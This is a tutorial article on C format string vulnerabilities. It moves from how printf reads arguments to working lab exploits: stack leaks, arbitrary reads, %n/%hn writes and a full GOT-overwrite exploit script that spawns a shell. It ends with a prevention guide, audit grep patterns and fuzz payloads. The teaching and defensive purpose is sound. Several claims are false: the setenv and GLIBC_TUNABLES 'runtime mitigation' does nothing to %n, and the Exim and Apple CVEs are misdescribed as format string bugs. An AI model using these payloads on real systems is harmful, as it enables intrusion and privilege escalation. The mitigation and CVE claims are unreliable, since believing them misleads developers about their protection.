Format string vulnerabilities are unique in the exploit world. Most memory corruption bugs give you either a read or a write — buffer overflows write, out-of-bounds reads leak data. Format strings give you both. A single printf(user_input) call gives the attacker the ability to read arbitrary stack memory AND write to arbitrary memory addresses.
The fix is one of the simplest in all of security: use printf("%s", input) instead of printf(input). Yet format string bugs keep appearing in production code because developers don’t understand why the first form is dangerous.
How printf() Actually Works
To understand the vulnerability, you need to understand how variadic functions work in C.
printf is a variadic function — it accepts a variable number of arguments. The first argument is always the format string, which tells printf how many additional arguments to expect and how to interpret them:
printf("Name: %s, Age: %d, Balance: %.2f\n", name, age, balance);
// ↑ format string ↑ 3 additional argsWhen printf encounters %s, it reads the next value from the stack (or register, depending on calling convention) and interprets it as a string pointer. When it encounters %d, it reads the next value as an integer.
The critical detail: printf has no way to verify how many arguments were actually passed. It trusts the format string completely. If the format string says “read 10 arguments,” printf reads 10 values from the stack — even if only 2 were passed.
// This compiles and runs without error:
printf("%x %x %x %x %x"); // No arguments provided
// printf reads 5 values off the stack
// Those values are whatever happens to be there — local variables,
// saved registers, return addresses, canaries, secrets...The Vulnerable Pattern
The vulnerability exists whenever user-controlled data is used as the format string:
// VULNERABLE — user controls the format string
char *user_input = get_user_input();
printf(user_input); // Classic format string bug
fprintf(stderr, user_input); // Same bug, different stream
sprintf(buffer, user_input); // Same bug, writes to buffer
snprintf(buf, sz, user_input); // Still vulnerable to read/write
syslog(LOG_INFO, user_input); // Syslog uses printf internally// SAFE — user input is an argument, not the format
printf("%s", user_input); // Safe
fprintf(stderr, "%s", user_input); // Safe
sprintf(buffer, "%s", user_input); // Safe (but watch buffer overflow)
syslog(LOG_INFO, "%s", user_input); // SafeThe difference is one argument. That one argument is the difference between a normal string print and giving the attacker complete control over your program’s memory.
Attack Phase 1: Reading Stack Memory
The simplest format string attack — leak information from the stack.
Basic Stack Dump
#include <stdio.h>
void vulnerable(char *input) {
char secret[] = "S3CR3T_K3Y";
int admin_flag = 0;
// VULNERABLE: user input as format string
printf(input);
printf("\n");
}
int main(int argc, char *argv[]) {
if (argc > 1) vulnerable(argv[1]);
return 0;
}Compile without protections for learning:
gcc -m32 -fno-stack-protector -no-pie -z execstack -o vuln vuln.cNow attack:
# Leak stack values as hex
$ ./vuln "%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
bffff5a0.00000001.0804a008.bffff798.08048460.bffff5c0.33524353.4b5f5433
# Last two values: 0x33524353 = "3RCS" and 0x4b5f5433 = "K_T3"
# That's "S3CR3T_K3Y" in little-endian chunks — the secret is leaked!Each %08x reads one 4-byte value from the stack and prints it as hex. The attacker keeps adding specifiers until they’ve dumped enough of the stack to find interesting data.
Direct Parameter Access
Instead of dumping sequentially, %N$x reads the Nth argument directly:
# Read the 7th stack value directly
$ ./vuln "%7\$x"
33524353
# Read as string — might crash if value isn't a valid pointer
$ ./vuln "%7\$s"
S3CR3T_K3YThis is more precise and allows targeted data extraction. The attacker finds which stack position contains their target, then extracts it directly.
Reading Arbitrary Memory Addresses
The attacker can read memory at any address by combining stack control with %s:
# Step 1: Find which stack position reflects our input
$ ./vuln "AAAA%6\$x"
AAAA41414141
# Position 6 contains our input (0x41414141 = "AAAA")
# Step 2: Replace AAAA with a target address, use %s to read it as a string
$ ./vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'\x10\xa0\x04\x08' + b'%6\$s')")
# Reads whatever string is stored at address 0x0804a010This turns a format string bug into an arbitrary read — the attacker can read any readable memory address.
What Attackers Leak
| Target | Why |
|---|---|
| Stack canary | Needed to bypass stack protector in buffer overflow |
| Return address | Reveals code section base (defeats PIE) |
| libc address | Reveals libc base (defeats ASLR for ROP chains) |
| Heap pointers | Useful for heap exploitation |
| Secrets/keys | API keys, encryption keys, session tokens stored in stack variables |
Attack Phase 2: Writing to Memory
This is where format strings become truly dangerous. The %n specifier writes instead of reading.
int count;
printf("Hello%n World", &count);
// %n writes the number of bytes printed so far (5) into count
// count is now 5In a format string attack, the attacker controls which address %n writes to and what value is written:
Building the Write Primitive
# Step 1: We know position 6 reflects our input (from the read phase)
# Step 2: Place target address in our input, use %n to write to it
# Target: 0x0804a010 (e.g., GOT entry for puts)
# We want to write the value 0xDEAD to this address
$ ./vuln $(python3 -c "
import struct
addr = struct.pack('<I', 0x0804a010) # Target address
# %56944x pads output to 0xDEAD (57005 - 4 bytes already printed = 56901... adjusted)
payload = addr + b'%56901x%6\$n'
import sys; sys.stdout.buffer.write(payload)
")The key insight: %n writes the number of bytes printed so far. By padding the output with %Nx (print N characters of padding), the attacker controls the written value.
Writing Large Values with Short Writes
Writing a full 4-byte address at once requires printing billions of characters. The practical approach uses %hn (half-word write) or %hhn (byte write):
%n — writes 4 bytes (int)
%hn — writes 2 bytes (short)
%hhn — writes 1 byte (char)To write 0xDEADBEEF to address 0x0804a010:
Write 0xBEEF to 0x0804a010 (low 2 bytes) using %hn
Write 0xDEAD to 0x0804a012 (high 2 bytes) using %hn
Payload:
[addr_low][addr_high]%[pad1]x%[pos1]$hn%[pad2]x%[pos2]$hn
Where:
addr_low = \x10\xa0\x04\x08 (0x0804a010)
addr_high = \x12\xa0\x04\x08 (0x0804a012)
pad1 = 0xBEEF - 8 = 48871 (adjust for already printed bytes)
pad2 = 0xDEAD - 0xBEEF = 7870 (difference between values)GOT Overwrite — The Classic Technique
The Global Offset Table (GOT) contains function pointers for dynamically linked functions. Overwriting a GOT entry redirects future calls to that function:
Before:
printf@GOT → 0x7f12345678 (real printf in libc)
After format string write:
printf@GOT → 0x7f12340010 (system() in libc)
Next time the program calls printf(user_input):
→ Actually calls system(user_input)
→ If user_input = "/bin/sh" → shell!// Vulnerable program
void process(char *input) {
printf(input); // Format string bug
printf("\n"); // After GOT overwrite, this calls system("\n")
// Better attack: if there's a second printf with controlled input
char cmd[100];
fgets(cmd, 100, stdin);
printf(cmd); // Now calls system(cmd) → system("/bin/sh")
}Complete Exploitation Walkthrough
Here’s a realistic exploitation scenario, step by step:
// target.c — vulnerable server that reads input and logs it
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void log_message(char *msg) {
printf("[LOG] ");
printf(msg); // VULNERABLE
printf("\n");
}
void admin_panel() {
printf("ACCESS GRANTED — admin shell\n");
system("/bin/sh");
}
int main() {
char input[256];
printf("Enter message: ");
fgets(input, sizeof(input), stdin);
input[strcspn(input, "\n")] = '\0';
log_message(input);
return 0;
}# Compile with partial protections (no PIE, no RELRO for GOT write)
gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.cStep 1: Find input offset
$ echo 'AAAA%6$x' | ./target
[LOG] AAAA41414141
# Input is at position 6Step 2: Find admin_panel address
$ objdump -d target | grep admin_panel
0804852d <admin_panel>:Step 3: Find a GOT entry to overwrite
$ objdump -R target | grep printf
0804a010 R_386_JUMP_SLOT printf@GLIBCStep 4: Write admin_panel address (0x0804852d) to printf@GOT (0x0804a010)
# exploit.py
import struct
got_printf_low = struct.pack('<I', 0x0804a010) # Low 2 bytes
got_printf_high = struct.pack('<I', 0x0804a012) # High 2 bytes
# admin_panel = 0x0804852d
# Low half = 0x852d = 34093
# High half = 0x0804 = 2052
# Payload: [addr1][addr2] = 8 bytes already printed
# Write 0x852d to low: need to print 34093 - 8 = 34085 more chars
# Write 0x0804 to high: 0x10804 - 0x852d = 33495 more chars (wraps to 0x0804)
payload = got_printf_low + got_printf_high
payload += b'%34085x%6$hn' # Write 0x852d to printf@GOT low
payload += b'%33495x%7$hn' # Write 0x0804 to printf@GOT high
import sys
sys.stdout.buffer.write(payload + b'\n')$ python3 exploit.py | ./target
[LOG] ... (lots of whitespace padding) ...
ACCESS GRANTED — admin shell
# Next printf(msg) actually calls admin_panel() → system("/bin/sh")Format String Bugs in Modern Code
Format string bugs aren’t limited to ancient C code. They appear in:
Logging Libraries
// C — syslog
syslog(LOG_INFO, user_input); // VULNERABLE
syslog(LOG_INFO, "%s", user_input); // Safe
// C++ — still possible if wrapping printf
void log(const char *msg) {
fprintf(logfile, msg); // VULNERABLE
fprintf(logfile, "%s", msg); // Safe
}C++ iostream vs printf
// iostream is inherently safe — no format specifiers
std::cout << user_input; // Safe — always treats as data
// But C++ code often still uses printf for formatting
printf(user_input.c_str()); // VULNERABLE — same bugPython — Not Immune
Python’s % operator doesn’t have %n, but format strings can still leak information:
# Python format string information disclosure
user_input = "{0.__class__.__mro__[1].__subclasses__()}"
print(user_input.format(some_object))
# Leaks all subclasses — used in template injection attacks
# f-strings evaluated at definition time — safe from injection
name = f"{user_input}" # Safe — user_input is data, not format
# But str.format() with user-controlled format IS dangerous
template = user_input # User provides: {config.secret_key}
template.format(config=app.config) # Leaks secret_key!Rust — Compile-Time Prevention
// Rust's format macros are checked at compile time
println!("{}", user_input); // Safe — format is a literal
// This won't even compile:
// let fmt = user_input;
// println!(fmt); // ERROR: format argument must be a string literalReal-World Format String CVEs
Wu-FTPd (CVE-2000-0573)
One of the first widely exploited format string bugs. The FTP server passed user-supplied SITE EXEC arguments directly to a printf-like function. Remote root access on any system running Wu-FTPd.
sudo (CVE-2012-0809)
sudo version 1.8.0–1.8.3p1 had a format string vulnerability where the program name (argv[0]) was passed directly to a logging function using printf semantics. An attacker could create a symlink with format specifiers in the name:
ln -s /usr/bin/sudo '%n%n%n%n'
./'%n%n%n%n' /bin/sh # Triggered format string write → root shellExim Mail Server (CVE-2019-15846)
Format string bug in Exim’s TLS SNI (Server Name Indication) handler. An attacker could send a crafted TLS ClientHello with format specifiers in the SNI field, achieving remote code execution as root on the mail server.
iOS/macOS (CVE-2021-1782, multiple)
Apple has had several format string vulnerabilities in system services over the years, usually in logging code that passes user-controlled data to os_log or NSLog without a format specifier.
Prevention — The Complete Guide
Rule 1: Never Pass User Input as a Format String
// The one rule that prevents 100% of format string vulnerabilities:
printf("%s", user_input); // ALWAYS use a format specifier
// This applies to EVERY printf-family function:
printf("%s", msg);
fprintf(f, "%s", msg);
sprintf(buf, "%s", msg);
snprintf(buf, sz, "%s", msg);
syslog(pri, "%s", msg);
err(1, "%s", msg);
warn("%s", msg);Rule 2: Compiler Warnings
GCC and Clang can detect most format string bugs at compile time:
# Enable format string warnings
gcc -Wformat -Wformat-security -Werror -o program program.c
# -Wformat: Check format string/argument type mismatches
# -Wformat-security: Warn when format string is not a literal
# -Werror: Treat warnings as errors (blocks compilation)// With -Wformat-security, this triggers a warning:
printf(user_input);
// warning: format not a string literal and no format arguments [-Wformat-security]Rule 3: GCC’s attribute((format))
For custom printf-like functions, annotate them so the compiler checks their format strings:
// Tell GCC: argument 1 is a printf format, arguments start at 2
void my_log(const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void my_log(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
vfprintf(logfile, fmt, args);
va_end(args);
}
// Now GCC checks format string at compile time:
my_log("%s logged in", username); // OK
my_log(user_input); // WARNING
my_log("%d", "not an int"); // WARNING — type mismatchRule 4: Static Analysis
# Clang Static Analyzer
scan-build gcc -o program program.c
# CodeQL (GitHub's static analysis)
# Rule: cpp/non-constant-format
# Detects: printf-family calls with non-constant format strings
# Coverity
# CID: TAINTED_STRING
# Detects: User-tainted data flowing into format string position
# Flawfinder / rats
flawfinder --minlevel=3 program.c
# Reports all printf calls with non-literal format stringsRule 5: FORTIFY_SOURCE
When compiled with -D_FORTIFY_SOURCE=2, glibc’s printf family rejects %n when the format string is in writable memory:
// With FORTIFY_SOURCE=2:
char fmt[] = "%s%n"; // Format in writable memory (stack/heap)
printf(fmt, str, &count); // *** %n in writable segment detected *** → abort
// Format in read-only memory (string literal) still works:
printf("%s%n", str, &count); // OK — format is in .rodataThis doesn’t fix the information leak (%x/%p still work), but it prevents the write primitive.
Rule 6: Runtime Mitigations
// Disable %n entirely in glibc (environment variable)
setenv("LIBC_FATAL_STDERR_", "1", 1);
// Or at the OS level (systemd service):
// Environment=GLIBC_TUNABLES=glibc.cpu.hwcaps=-FSGSBASEFormat String vs Buffer Overflow
| Dimension | Format String | Buffer Overflow |
|---|---|---|
| Cause | User input as format string | Missing bounds check on copy |
| Read primitive | Yes — %x, %p, %s leak stack |
No (need separate info leak) |
| Write primitive | Yes — %n writes to memory |
Yes — overwrite return addr/GOT |
| Precision | Can write exact values byte-by-byte | Overwrites everything in between |
| ASLR bypass | Built-in (leak with %p, write with %n) |
Requires separate info leak |
| Stack canary bypass | Leak canary with %x, include in payload |
Much harder — timing/brute force |
| Detection | Easy — -Wformat-security catches most |
Harder — requires bounds analysis |
| Fix complexity | Trivial — add "%s", |
Varies — may require redesign |
The key advantage of format strings for attackers: they provide both read and write in a single vulnerability, making ASLR and stack canaries much easier to bypass than with buffer overflows alone.
Detection and Auditing
Grep Patterns for Code Review
# Find potentially vulnerable printf-family calls in C/C++ code
grep -rn 'printf\s*(' --include="*.c" --include="*.cpp" --include="*.h" | \
grep -v 'printf\s*("' | \
grep -v 'printf\s*("%'
# Shows printf calls where first arg is NOT a string literal
# Find syslog calls without format specifiers
grep -rn 'syslog\s*(' --include="*.c" | grep -v '"%'
# Find sprintf without literal format (also check for buffer overflow)
grep -rn 'sprintf\s*(' --include="*.c" | grep -v 'sprintf\s*([^,]*, *"'Automated Testing
# Fuzz with format string payloads
echo '%x%x%x%x%x%x%x%x' | ./program
echo '%s%s%s%s%s%s%s%s' | ./program # Likely crashes if vulnerable
echo '%n%n%n%n%n%n%n%n' | ./program # Crashes = write works (FORTIFY stops this)
echo 'AAAA%p%p%p%p%p%p%p%p' | ./program # Look for 0x41414141 in output
# If any of these produce unexpected output or crashes, investigate.Security Checklist
CODE:
[ ] No printf-family call uses user input as format string
[ ] All custom logging functions use "%s" for user data
[ ] Custom printf-like functions have __attribute__((format))
[ ] No string concatenation to build format strings with user data
[ ] Python str.format() / f-strings don't use user-controlled templates
COMPILE:
[ ] -Wformat and -Wformat-security enabled
[ ] -Werror treats format warnings as errors
[ ] -D_FORTIFY_SOURCE=2 enabled (blocks %n in writable memory)
[ ] Static analysis runs in CI (CodeQL, Coverity, or clang-tidy)
RUNTIME:
[ ] ASLR enabled
[ ] Full RELRO (-Wl,-z,relro,-z,now) prevents GOT overwrite
[ ] PIE enabled (makes GOT address unpredictable)
[ ] Stack canaries enabled (-fstack-protector-strong)
REVIEW:
[ ] Code review checklist includes format string patterns
[ ] Grep audit for printf-family calls run before release
[ ] Fuzz testing includes format string payloadsFormat string vulnerabilities are the easiest critical bug to prevent. One rule — printf("%s", input) — eliminates the entire class. Yet they keep appearing because developers don’t understand what printf(input) actually does at the machine level. Now you do.








